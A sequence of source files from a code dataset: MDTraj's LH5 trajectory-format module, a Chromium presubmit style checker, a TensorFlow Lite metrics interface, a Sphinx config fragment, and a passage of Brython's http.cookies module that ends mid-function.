# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'python-wpa-supplicant', u'python-wpa-supplicant Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'python-wpa-supplicant', u'python-wpa-supplicant Documentation',
author, 'python-wpa-supplicant', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mpl-2.0 |
ctk3b/mdtraj | mdtraj/formats/lh5.py | 11 | 17930 | ##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2014 Stanford University and the Authors
#
# Authors: Robert McGibbon, Kyle A. Beauchamp
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
""" MSMBuilder2 "LH5" trajectory format.
"""
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import sys
import numpy as np
from mdtraj.core import element as elem
from mdtraj.utils.six import iteritems, PY3, u
from mdtraj.formats.registry import FormatRegistry
from mdtraj.utils import import_, ensure_type, in_units_of, cast_indices
from mdtraj.formats.hdf5 import _check_mode
import warnings
MAXINT16 = np.iinfo(np.int16).max
MAXINT32 = np.iinfo(np.int32).max
DEFAULT_PRECISION = 1000
if PY3:
basestring = str
__all__ = ['LH5TrajectoryFile', 'load_lh5']
##############################################################################
# Utilities
##############################################################################
def _topology_from_arrays(AtomID, AtomNames, ChainID, ResidueID, ResidueNames):
"""Build topology object from the arrays stored in the lh5 file"""
    # Delayed import due to wacky recursive imports in compatibility
from mdtraj import Topology
topology = Topology()
# assert that the ChainID is just an array of empty strings, which appears
# to be the case in our test systems for this legacy format
    if not all(chainid in ('', b'') for chainid in ChainID):
        raise NotImplementedError("I'm not prepared to parse multiple chains")
chain0 = topology.add_chain()
# register the residues
registered_residues = {}
for i in np.argsort(ResidueID):
residue_name = ResidueNames[i]
if not isinstance(residue_name, basestring):
residue_name = residue_name.decode()
if ResidueID[i] not in registered_residues:
res = topology.add_residue(residue_name, chain0)
registered_residues[ResidueID[i]] = res
# register the atoms
for i in np.argsort(AtomID):
atom_name = AtomNames[i]
if not isinstance(atom_name, basestring):
atom_name = atom_name.decode()
element_symbol = atom_name.lstrip('0123456789')[0]
try:
element = elem.get_by_symbol(element_symbol)
except KeyError:
element = elem.virtual
topology.add_atom(atom_name, element,
registered_residues[ResidueID[i]])
topology.create_standard_bonds()
return topology
def _convert_from_lossy_integers(X, precision=DEFAULT_PRECISION):
"""Implementation of the lossy compression used in Gromacs XTC using
the pytables library. Convert 16 bit integers into 32 bit floats."""
X2 = X.astype("float32")
X2 /= float(precision)
return X2
def _convert_to_lossy_integers(X, precision=DEFAULT_PRECISION):
"""Implementation of the lossy compression used in Gromacs XTC using the pytables library. Convert 32 bit floats into 16 bit integers. These conversion functions have been optimized for memory use. Further memory reduction would require an in-place astype() operation, which one could create using ctypes."""
if np.max(X) * float(precision) < MAXINT16 and np.min(X) * float(precision) > -MAXINT16:
X *= float(precision)
Rounded = X.astype("int16")
X /= float(precision)
else:
        raise ValueError("Data range too large for lh5. Try removing center of "
                         "mass motion, check for 'blowing up', or use a different "
                         "trajectory format")
return Rounded
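# Editorial note (illustrative, not part of the original module): with the
# default precision of 1000 the lossy round trip keeps roughly three decimal
# places, e.g.
#
#   x = np.array([[1.2345, -0.4321]], dtype=np.float32)
#   y = _convert_from_lossy_integers(_convert_to_lossy_integers(x))
#   # y is approximately [[1.234, -0.432]]
#
# provided abs(value) * precision stays below MAXINT16; larger values make
# _convert_to_lossy_integers raise ValueError, as above.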
##############################################################################
# Main code
##############################################################################
@FormatRegistry.register_loader('.lh5')
def load_lh5(filename, top=None, stride=None, atom_indices=None, frame=None):
"""Load an deprecated MSMBuilder2 LH5 trajectory file.
Parameters
----------
filename : str
filename of AMBER NetCDF file.
top : {str, Trajectory, Topology}
The NetCDF format does not contain topology information. Pass in either
the path to a pdb file, a trajectory, or a topology to supply this
information.
stride : int, default=None
Only read every stride-th frame
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file. This may be slightly slower than the standard read because it
requires an extra copy, but will save memory.
frame : int, optional
Use this option to load only a single frame from a trajectory on disk.
If frame is None, the default, the entire trajectory will be loaded.
If supplied, ``stride`` will be ignored.
See Also
--------
mdtraj.LH5TrajectoryFile : Low level interface to LH5 files
"""
atom_indices = cast_indices(atom_indices)
with LH5TrajectoryFile(filename) as f:
if frame is not None:
f.seek(frame)
n_frames = 1
else:
n_frames = None
return f.read_as_traj(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
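# Illustrative call (editorial addition; the file name is a placeholder):
#
#   traj = load_lh5("frame0.lh5", stride=5)
#   print(traj.n_frames, traj.n_atoms)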
@FormatRegistry.register_fileobject('.lh5')
class LH5TrajectoryFile(object):
"""Interface for reading and writing to a MSMBuilder2 "LH5" molecular
dynamics trajectory file, a deprecated format.
Parameters
----------
filename : str
Path to the file to open
mode : {'r, 'w'}
Mode in which to open the file. 'r' is for reading and 'w' is for
writing
force_overwrite : bool
In mode='w', how do you want to behave if a file by the name of `filename`
already exists? if `force_overwrite=True`, it will be overwritten.
"""
distance_unit = 'nanometers'
def __init__(self, filename, mode='r', force_overwrite=True):
self._open = False
self.filename = filename
self.mode = mode
if mode == 'w' and not force_overwrite and os.path.exists(filename):
raise IOError('"%s" already exists' % filename)
# import tables
self.tables = import_('tables')
if mode == 'w':
print("Warning: The LH5 trajectory format is deprecated.", file=sys.stderr)
# what frame are we currently reading or writing at?
self._frame_index = 0
# do we need to write the header information?
self._needs_initialization = True
if not filename.endswith('.lh5'):
warnings.warn('The .lh5 extension is recommended.')
elif mode == 'r':
self._frame_index = 0
self._needs_initialization = False
else:
raise ValueError("mode must be one of ['r', 'w']")
# Compression style of legacy MSMBuilder2 lh5 trajectory format
compression = self.tables.Filters(
complib='blosc', shuffle=True, complevel=1)
self._handle = self._open_file(
filename, mode=mode, filters=compression)
self._open = True
@property
def topology(self):
"""Get the topology out from the file
Returns
-------
topology : mdtraj.Topology
A topology object
"""
        if np.all(self._handle.root.AtomID[:] == 0) and (np.all(self._handle.root.AtomNames[:] == b'')
                                                         or np.all(self._handle.root.AtomNames[:] == u(''))):
return None
return _topology_from_arrays(
self._handle.root.AtomID[:], self._handle.root.AtomNames[:],
self._handle.root.ChainID[:], self._handle.root.ResidueID[:],
self._handle.root.ResidueNames[:])
@topology.setter
def topology(self, top):
"""Set the topology in the file
Parameters
----------
top : mdtraj.Topology
A topology object
"""
_check_mode(self.mode, ('w',))
if self._needs_initialization:
self._initialize_headers(top.n_atoms)
self._needs_initialization = False
top, bonds = top.to_dataframe()
data = {
"AtomID": top.index.values + 1,
"AtomNames": top.name.values,
"ResidueNames": top.resName.values,
"ChainID": top.chainID.values,
"ResidueID": top.resSeq.values + 1,
}
        for key, val in iteritems(data):
            node = self._get_node(where='/', name=key)
            node[:] = val[:]
def read_as_traj(self, n_frames=None, stride=None, atom_indices=None):
"""Read a trajectory from the LH5 file
Parameters
----------
n_frames : {int, None}
The number of frames to read. If not supplied, all of the
remaining frames will be read.
stride : {int, None}
By default all of the frames will be read, but you can pass this
flag to read a subset of of the data by grabbing only every
`stride`-th frame from disk.
atom_indices : {int, None}
By default all of the atom will be read, but you can pass this
flag to read only a subsets of the atoms for the `coordinates` and
`velocities` fields. Note that you will have to carefully manage
the indices and the offsets, since the `i`-th atom in the topology
will not necessarily correspond to the `i`-th atom in your subset.
Returns
-------
trajectory : Trajectory
A trajectory object containing the loaded portion of the file.
"""
_check_mode(self.mode, ('r',))
from mdtraj.core.trajectory import Trajectory
topology = self.topology
if atom_indices is not None:
topology = topology.subset(atom_indices)
initial = int(self._frame_index)
xyz = self.read(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
if len(xyz) == 0:
return Trajectory(xyz=np.zeros((0, topology.n_atoms, 3)), topology=topology)
in_units_of(xyz, self.distance_unit, Trajectory._distance_unit, inplace=True)
if stride is None:
stride = 1
time = (stride*np.arange(len(xyz))) + initial
return Trajectory(xyz=xyz, topology=topology, time=time)
def read(self, n_frames=None, stride=None, atom_indices=None):
"""Read one or more frames of data from the file
Parameters
----------
n_frames : {int, None}
The number of frames to read. If not supplied, all of the
remaining frames will be read.
stride : {int, None}
By default all of the frames will be read, but you can pass this
flag to read a subset of of the data by grabbing only every
`stride`-th frame from disk.
atom_indices : {int, None}
By default all of the atom will be read, but you can pass this
flag to read only a subsets of the atoms for the `coordinates` and
`velocities` fields. Note that you will have to carefully manage
the indices and the offsets, since the `i`-th atom in the topology
will not necessarily correspond to the `i`-th atom in your subset.
Returns
-------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3), dtype=np.float32
The cartesian coordinates, in nanometers
"""
_check_mode(self.mode, ('r'))
if n_frames is None:
n_frames = np.inf
if stride is not None:
stride = int(stride)
if atom_indices is None:
atom_slice = slice(None)
else:
atom_slice = ensure_type(atom_indices, dtype=np.int, ndim=1,
name='atom_indices', warn_on_cast=False)
total_n_frames = len(self._handle.root.XYZList)
frame_slice = slice(self._frame_index, min(
self._frame_index + n_frames, total_n_frames), stride)
if frame_slice.stop - frame_slice.start == 0:
return np.array([], dtype=np.float32)
xyz = self._handle.root.XYZList.__getitem__((frame_slice, atom_slice))
if xyz.dtype == np.int16 or xyz.dtype == np.int32:
xyz = _convert_from_lossy_integers(xyz)
self._frame_index += (frame_slice.stop - frame_slice.start)
return xyz
def write(self, coordinates):
"""Write one or more frames of data to the file
Parameters
----------
coordinates : np.ndarray, dtype=np.float32, shape=(n_frames, n_atoms, 3)
The cartesian coordinates of the atoms in every frame, in nanometers.
"""
_check_mode(self.mode, ('w'))
coordinates = ensure_type(coordinates, dtype=np.float32, ndim=3,
name='coordinates', shape=(None, None, 3), can_be_none=False,
warn_on_cast=False, add_newaxis_on_deficient_ndim=True)
if self._needs_initialization:
self._initialize_headers(coordinates.shape[1])
self._needs_initialization = False
coordinates = _convert_to_lossy_integers(coordinates)
self._get_node(where='/', name='XYZList').append(coordinates)
def _initialize_headers(self, n_atoms):
_check_mode(self.mode, ('w'))
self._create_carray(
where='/', name='AtomID', atom=self.tables.Int64Atom(), shape=(n_atoms,))
self._create_carray(
where='/', name='AtomNames', atom=self.tables.StringAtom(itemsize=4),
shape=(n_atoms,))
self._create_carray(
where='/', name='ResidueNames', atom=self.tables.StringAtom(itemsize=4),
shape=(n_atoms,))
self._create_carray(
where='/', name='ChainID', atom=self.tables.StringAtom(itemsize=1),
shape=(n_atoms,))
self._create_carray(
where='/', name='ResidueID', atom=self.tables.Int64Atom(), shape=(n_atoms,))
self._create_earray(
where='/', name='XYZList', atom=self.tables.Int16Atom(),
shape=(0, n_atoms, 3))
def seek(self, offset, whence=0):
"""Move to a new file position
Parameters
----------
offset : int
A number of frames.
whence : {0, 1, 2}
0: offset from start of file, offset should be >=0.
1: move relative to the current position, positive or negative
2: move relative to the end of file, offset should be <= 0.
Seeking beyond the end of a file is not supported
"""
_check_mode(self.mode, ('r',))
if whence == 0 and offset >= 0:
self._frame_index = offset
elif whence == 1:
self._frame_index = self._frame_index + offset
elif whence == 2 and offset <= 0:
self._frame_index = len(self._handle.root.XYZList) + offset
else:
raise IOError('Invalid argument')
def tell(self):
"""Current file position
Returns
-------
offset : int
The current frame in the file.
"""
return int(self._frame_index)
def close(self):
"Close the HDF5 file handle"
if self._open:
self._handle.close()
self._open = False
def flush(self):
"Write all buffered data in the to the disk file."
if self._open:
self._handle.flush()
def __len__(self):
"Number of frames in the file"
if not self._open:
raise ValueError('I/O operation on closed file')
return len(self._handle.root.XYZList)
def __del__(self):
self.close()
def __enter__(self):
"Support the context manager protocol"
return self
def __exit__(self, *exc_info):
"Support the context manager protocol"
self.close()
# pytables 2/3 compatibility. pytables3 throws really annoying pending
# deprecation warnings if you dont use the new method names
@property
def _open_file(self):
if self.tables.__version__ >= '3.0.0':
return self.tables.open_file
return self.tables.openFile
@property
def _remove_node(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.remove_node
return self._handle.removeNode
@property
def _create_carray(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.create_carray
return self._handle.createCArray
@property
def _create_earray(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.create_earray
return self._handle.createEArray
@property
def _get_node(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.get_node
return self._handle.getNode
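# Illustrative usage sketch (editorial addition; the file name below is a
# placeholder). Reading frames from an existing legacy .lh5 trajectory:
#
#   with LH5TrajectoryFile("example.lh5") as f:
#       xyz = f.read(n_frames=10, stride=2)    # coordinates, in nanometers
#       traj = f.read_as_traj()                # remaining frames as a Trajectory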
| lgpl-2.1 |
xhteam/external-chromium | googleurl/PRESUBMIT.py | 93 | 3371 | #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for googleurl.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API built into gcl.
"""
# Files with these extensions will be considered source files
SOURCE_FILE_EXTENSIONS = [
'.c', '.cc', '.cpp', '.h', '.m', '.mm', '.py', '.mk', '.am', '.json',
]
EXCLUDED_PATHS = [
r".*third_party[\\\/].*",
]
def ReadFile(path):
"""Given a path, returns the full contents of the file.
Reads files in binary format.
"""
fo = open(path, 'rb')
try:
contents = fo.read()
finally:
fo.close()
return contents
def CheckChangeOnUpload(input_api, output_api):
# TODO(brettw) Enforce 80 cols.
return LocalChecks(input_api, output_api, max_cols=0)
def CheckChangeOnCommit(input_api, output_api):
# TODO(brettw) Enforce 80 cols.
return (LocalChecks(input_api, output_api, max_cols=0) +
input_api.canned_checks.CheckDoNotSubmit(input_api, output_api))
def LocalChecks(input_api, output_api, max_cols=80):
"""Reports an error if for any source file in SOURCE_FILE_EXTENSIONS:
- uses CR (or CRLF)
- contains a TAB
- has a line that ends with whitespace
- contains a line >|max_cols| cols unless |max_cols| is 0.
Note that the whole file is checked, not only the changes.
"""
cr_files = []
results = []
excluded_paths = [input_api.re.compile(x) for x in EXCLUDED_PATHS]
files = input_api.AffectedFiles()
for f in files:
path = f.LocalPath()
root, ext = input_api.os_path.splitext(path)
# Look for unsupported extensions.
if not ext in SOURCE_FILE_EXTENSIONS:
continue
# Look for excluded paths.
found = False
for item in excluded_paths:
if item.match(path):
found = True
break
if found:
continue
# Need to read the file ourselves since AffectedFile.NewContents()
# will normalize line endings.
contents = ReadFile(path)
if '\r' in contents:
cr_files.append(path)
local_errors = []
# Remove EOL character.
lines = contents.splitlines()
line_num = 1
for line in lines:
if line.endswith(' '):
local_errors.append(output_api.PresubmitError(
'%s, line %s ends with whitespaces.' %
(path, line_num)))
# Accept lines with http:// to exceed the max_cols rule.
if max_cols and len(line) > max_cols and not 'http://' in line:
local_errors.append(output_api.PresubmitError(
'%s, line %s has %s chars, please reduce to %d chars.' %
(path, line_num, len(line), max_cols)))
if '\t' in line:
local_errors.append(output_api.PresubmitError(
"%s, line %s contains a tab character." %
(path, line_num)))
line_num += 1
# Just show the first 5 errors.
if len(local_errors) == 6:
local_errors.pop()
local_errors.append(output_api.PresubmitError("... and more."))
break
results.extend(local_errors)
if cr_files:
results.append(output_api.PresubmitError(
'Found CR (or CRLF) line ending in these files, please use only LF:',
items=cr_files))
return results
| bsd-3-clause |
paolodedios/tensorflow | tensorflow/lite/python/metrics_interface.py | 6 | 1570 | # Lint as: python2, python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python TFLite metrics helper interface."""
import abc
class TFLiteMetricsInterface(metaclass=abc.ABCMeta):
"""Abstract class for TFLiteMetrics."""
@abc.abstractmethod
def increase_counter_debugger_creation(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_interpreter_creation(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_converter_attempt(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_converter_success(self):
raise NotImplementedError
@abc.abstractmethod
def set_converter_param(self, name, value):
raise NotImplementedError
@abc.abstractmethod
def set_converter_error(self, error_data):
raise NotImplementedError
@abc.abstractmethod
def set_converter_latency(self, value):
raise NotImplementedError
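

# Editorial sketch (not part of the TensorFlow sources): a minimal no-op
# subclass showing how the abstract interface above can be satisfied. Real
# implementations forward these calls to a metrics backend.
class _NoOpTFLiteMetrics(TFLiteMetricsInterface):
  """Example concrete implementation that ignores every metric event."""

  def increase_counter_debugger_creation(self):
    pass

  def increase_counter_interpreter_creation(self):
    pass

  def increase_counter_converter_attempt(self):
    pass

  def increase_counter_converter_success(self):
    pass

  def set_converter_param(self, name, value):
    pass

  def set_converter_error(self, error_data):
    pass

  def set_converter_latency(self, value):
    pass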
| apache-2.0 |
pombredanne/teamwork | w2/static/Brython2.0.0-20140209-164925/Lib/http/cookies.py | 735 | 20810 | #!/usr/bin/env python3
#
####
# Copyright 2000 by Timothy O'Malley <[email protected]>
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software
# and its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Timothy O'Malley not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR
# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
####
#
# Id: Cookie.py,v 2.29 2000/08/23 05:28:49 timo Exp
# by Timothy O'Malley <[email protected]>
#
# Cookie.py is a Python module for the handling of HTTP
# cookies as a Python dictionary. See RFC 2109 for more
# information on cookies.
#
# The original idea to treat Cookies as a dictionary came from
# Dave Mitchell ([email protected]) in 1995, when he released the
# first version of nscookie.py.
#
####
r"""
Here's a sample session to show how to use this module.
At the moment, this is the only documentation.
The Basics
----------
Importing is easy...
>>> from http import cookies
Most of the time you start by creating a cookie.
>>> C = cookies.SimpleCookie()
Once you've created your Cookie, you can add values just as if it were
a dictionary.
>>> C = cookies.SimpleCookie()
>>> C["fig"] = "newton"
>>> C["sugar"] = "wafer"
>>> C.output()
'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'
Notice that the printable representation of a Cookie is the
appropriate format for a Set-Cookie: header. This is the
default behavior. You can change the header and printed
attributes by using the .output() function
>>> C = cookies.SimpleCookie()
>>> C["rocky"] = "road"
>>> C["rocky"]["path"] = "/cookie"
>>> print(C.output(header="Cookie:"))
Cookie: rocky=road; Path=/cookie
>>> print(C.output(attrs=[], header="Cookie:"))
Cookie: rocky=road
The load() method of a Cookie extracts cookies from a string. In a
CGI script, you would use this method to extract the cookies from the
HTTP_COOKIE environment variable.
>>> C = cookies.SimpleCookie()
>>> C.load("chips=ahoy; vienna=finger")
>>> C.output()
'Set-Cookie: chips=ahoy\r\nSet-Cookie: vienna=finger'
The load() method is darn-tootin smart about identifying cookies
within a string. Escaped quotation marks, nested semicolons, and other
such trickeries do not confuse it.
>>> C = cookies.SimpleCookie()
>>> C.load('keebler="E=everybody; L=\\"Loves\\"; fudge=\\012;";')
>>> print(C)
Set-Cookie: keebler="E=everybody; L=\"Loves\"; fudge=\012;"
Each element of the Cookie also supports all of the RFC 2109
Cookie attributes. Here's an example which sets the Path
attribute.
>>> C = cookies.SimpleCookie()
>>> C["oreo"] = "doublestuff"
>>> C["oreo"]["path"] = "/"
>>> print(C)
Set-Cookie: oreo=doublestuff; Path=/
Each dictionary element has a 'value' attribute, which gives you
back the value associated with the key.
>>> C = cookies.SimpleCookie()
>>> C["twix"] = "none for you"
>>> C["twix"].value
'none for you'
The SimpleCookie expects that all values should be standard strings.
Just to be sure, SimpleCookie invokes the str() builtin to convert
the value to a string, when the values are set dictionary-style.
>>> C = cookies.SimpleCookie()
>>> C["number"] = 7
>>> C["string"] = "seven"
>>> C["number"].value
'7'
>>> C["string"].value
'seven'
>>> C.output()
'Set-Cookie: number=7\r\nSet-Cookie: string=seven'
Finis.
"""
#
# Import our required modules
#
import re
import string
__all__ = ["CookieError", "BaseCookie", "SimpleCookie"]
_nulljoin = ''.join
_semispacejoin = '; '.join
_spacejoin = ' '.join
#
# Define an exception visible to External modules
#
class CookieError(Exception):
pass
# These quoting routines conform to the RFC2109 specification, which in
# turn references the character definitions from RFC2068. They provide
# a two-way quoting algorithm. Any non-text character is translated
# into a 4 character sequence: a backslash followed by the
# three-digit octal equivalent of the character. Any '\' or '"' is
# quoted with a preceding '\' slash.
#
# These are taken from RFC2068 and RFC2109.
# _LegalChars is the list of chars which don't require "'s
# _Translator hash-table for fast quoting
#
_LegalChars = string.ascii_letters + string.digits + "!#$%&'*+-.^_`|~:"
_Translator = {
'\000' : '\\000', '\001' : '\\001', '\002' : '\\002',
'\003' : '\\003', '\004' : '\\004', '\005' : '\\005',
'\006' : '\\006', '\007' : '\\007', '\010' : '\\010',
'\011' : '\\011', '\012' : '\\012', '\013' : '\\013',
'\014' : '\\014', '\015' : '\\015', '\016' : '\\016',
'\017' : '\\017', '\020' : '\\020', '\021' : '\\021',
'\022' : '\\022', '\023' : '\\023', '\024' : '\\024',
'\025' : '\\025', '\026' : '\\026', '\027' : '\\027',
'\030' : '\\030', '\031' : '\\031', '\032' : '\\032',
'\033' : '\\033', '\034' : '\\034', '\035' : '\\035',
'\036' : '\\036', '\037' : '\\037',
# Because of the way browsers really handle cookies (as opposed
# to what the RFC says) we also encode , and ;
',' : '\\054', ';' : '\\073',
'"' : '\\"', '\\' : '\\\\',
'\177' : '\\177', '\200' : '\\200', '\201' : '\\201',
'\202' : '\\202', '\203' : '\\203', '\204' : '\\204',
'\205' : '\\205', '\206' : '\\206', '\207' : '\\207',
'\210' : '\\210', '\211' : '\\211', '\212' : '\\212',
'\213' : '\\213', '\214' : '\\214', '\215' : '\\215',
'\216' : '\\216', '\217' : '\\217', '\220' : '\\220',
'\221' : '\\221', '\222' : '\\222', '\223' : '\\223',
'\224' : '\\224', '\225' : '\\225', '\226' : '\\226',
'\227' : '\\227', '\230' : '\\230', '\231' : '\\231',
'\232' : '\\232', '\233' : '\\233', '\234' : '\\234',
'\235' : '\\235', '\236' : '\\236', '\237' : '\\237',
'\240' : '\\240', '\241' : '\\241', '\242' : '\\242',
'\243' : '\\243', '\244' : '\\244', '\245' : '\\245',
'\246' : '\\246', '\247' : '\\247', '\250' : '\\250',
'\251' : '\\251', '\252' : '\\252', '\253' : '\\253',
'\254' : '\\254', '\255' : '\\255', '\256' : '\\256',
'\257' : '\\257', '\260' : '\\260', '\261' : '\\261',
'\262' : '\\262', '\263' : '\\263', '\264' : '\\264',
'\265' : '\\265', '\266' : '\\266', '\267' : '\\267',
'\270' : '\\270', '\271' : '\\271', '\272' : '\\272',
'\273' : '\\273', '\274' : '\\274', '\275' : '\\275',
'\276' : '\\276', '\277' : '\\277', '\300' : '\\300',
'\301' : '\\301', '\302' : '\\302', '\303' : '\\303',
'\304' : '\\304', '\305' : '\\305', '\306' : '\\306',
'\307' : '\\307', '\310' : '\\310', '\311' : '\\311',
'\312' : '\\312', '\313' : '\\313', '\314' : '\\314',
'\315' : '\\315', '\316' : '\\316', '\317' : '\\317',
'\320' : '\\320', '\321' : '\\321', '\322' : '\\322',
'\323' : '\\323', '\324' : '\\324', '\325' : '\\325',
'\326' : '\\326', '\327' : '\\327', '\330' : '\\330',
'\331' : '\\331', '\332' : '\\332', '\333' : '\\333',
'\334' : '\\334', '\335' : '\\335', '\336' : '\\336',
'\337' : '\\337', '\340' : '\\340', '\341' : '\\341',
'\342' : '\\342', '\343' : '\\343', '\344' : '\\344',
'\345' : '\\345', '\346' : '\\346', '\347' : '\\347',
'\350' : '\\350', '\351' : '\\351', '\352' : '\\352',
'\353' : '\\353', '\354' : '\\354', '\355' : '\\355',
'\356' : '\\356', '\357' : '\\357', '\360' : '\\360',
'\361' : '\\361', '\362' : '\\362', '\363' : '\\363',
'\364' : '\\364', '\365' : '\\365', '\366' : '\\366',
'\367' : '\\367', '\370' : '\\370', '\371' : '\\371',
'\372' : '\\372', '\373' : '\\373', '\374' : '\\374',
'\375' : '\\375', '\376' : '\\376', '\377' : '\\377'
}
def _quote(str, LegalChars=_LegalChars):
r"""Quote a string for use in a cookie header.
If the string does not need to be double-quoted, then just return the
string. Otherwise, surround the string in doublequotes and quote
(with a \) special characters.
"""
if all(c in LegalChars for c in str):
return str
else:
return '"' + _nulljoin(_Translator.get(s, s) for s in str) + '"'
_OctalPatt = re.compile(r"\\[0-3][0-7][0-7]")
_QuotePatt = re.compile(r"[\\].")
def _unquote(str):
# If there aren't any doublequotes,
# then there can't be any special characters. See RFC 2109.
if len(str) < 2:
return str
if str[0] != '"' or str[-1] != '"':
return str
# We have to assume that we must decode this string.
# Down to work.
# Remove the "s
str = str[1:-1]
# Check for special sequences. Examples:
# \012 --> \n
# \" --> "
#
i = 0
n = len(str)
res = []
while 0 <= i < n:
o_match = _OctalPatt.search(str, i)
q_match = _QuotePatt.search(str, i)
if not o_match and not q_match: # Neither matched
res.append(str[i:])
break
# else:
j = k = -1
if o_match:
j = o_match.start(0)
if q_match:
k = q_match.start(0)
if q_match and (not o_match or k < j): # QuotePatt matched
res.append(str[i:k])
res.append(str[k+1])
i = k + 2
else: # OctalPatt matched
res.append(str[i:j])
res.append(chr(int(str[j+1:j+4], 8)))
i = j + 4
return _nulljoin(res)
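# Hedged illustration (not part of the original module): for values containing
# characters outside _LegalChars the two helpers above are inverses, e.g.
# _quote('fudge\n') returns the Python string '"fudge\\012"', and
# _unquote('"fudge\\012"') returns 'fudge\n'.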
# The _getdate() routine is used to set the expiration time in the cookie's HTTP
# header. By default, _getdate() returns the current time in the appropriate
# "expires" format for a Set-Cookie header. The one optional argument is an
# offset from now, in seconds. For example, an offset of -3600 means "one hour
# ago". The offset may be a floating point number.
#
_weekdayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
_monthname = [None,
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
def _getdate(future=0, weekdayname=_weekdayname, monthname=_monthname):
from time import gmtime, time
now = time()
year, month, day, hh, mm, ss, wd, y, z = gmtime(now + future)
return "%s, %02d %3s %4d %02d:%02d:%02d GMT" % \
(weekdayname[wd], day, monthname[month], year, hh, mm, ss)
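# Hedged illustration (not part of the original module): _getdate() renders the
# current UTC time, and _getdate(3600) a time one hour in the future, in the
# form expected by an "expires" attribute, e.g. 'Sat, 01 Jan 2022 13:00:00 GMT'.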
class Morsel(dict):
"""A class to hold ONE (key, value) pair.
In a cookie, each such pair may have several attributes, so this class is
used to keep the attributes associated with the appropriate key,value pair.
This class also includes a coded_value attribute, which is used to hold
the network representation of the value. This is most useful when Python
objects are pickled for network transit.
"""
# RFC 2109 lists these attributes as reserved:
# path comment domain
# max-age secure version
#
# For historical reasons, these attributes are also reserved:
# expires
#
# This is an extension from Microsoft:
# httponly
#
# This dictionary provides a mapping from the lowercase
# variant on the left to the appropriate traditional
# formatting on the right.
_reserved = {
"expires" : "expires",
"path" : "Path",
"comment" : "Comment",
"domain" : "Domain",
"max-age" : "Max-Age",
"secure" : "secure",
"httponly" : "httponly",
"version" : "Version",
}
_flags = {'secure', 'httponly'}
def __init__(self):
# Set defaults
self.key = self.value = self.coded_value = None
# Set default attributes
for key in self._reserved:
dict.__setitem__(self, key, "")
def __setitem__(self, K, V):
K = K.lower()
if not K in self._reserved:
raise CookieError("Invalid Attribute %s" % K)
dict.__setitem__(self, K, V)
def isReservedKey(self, K):
return K.lower() in self._reserved
def set(self, key, val, coded_val, LegalChars=_LegalChars):
# First we verify that the key isn't a reserved word
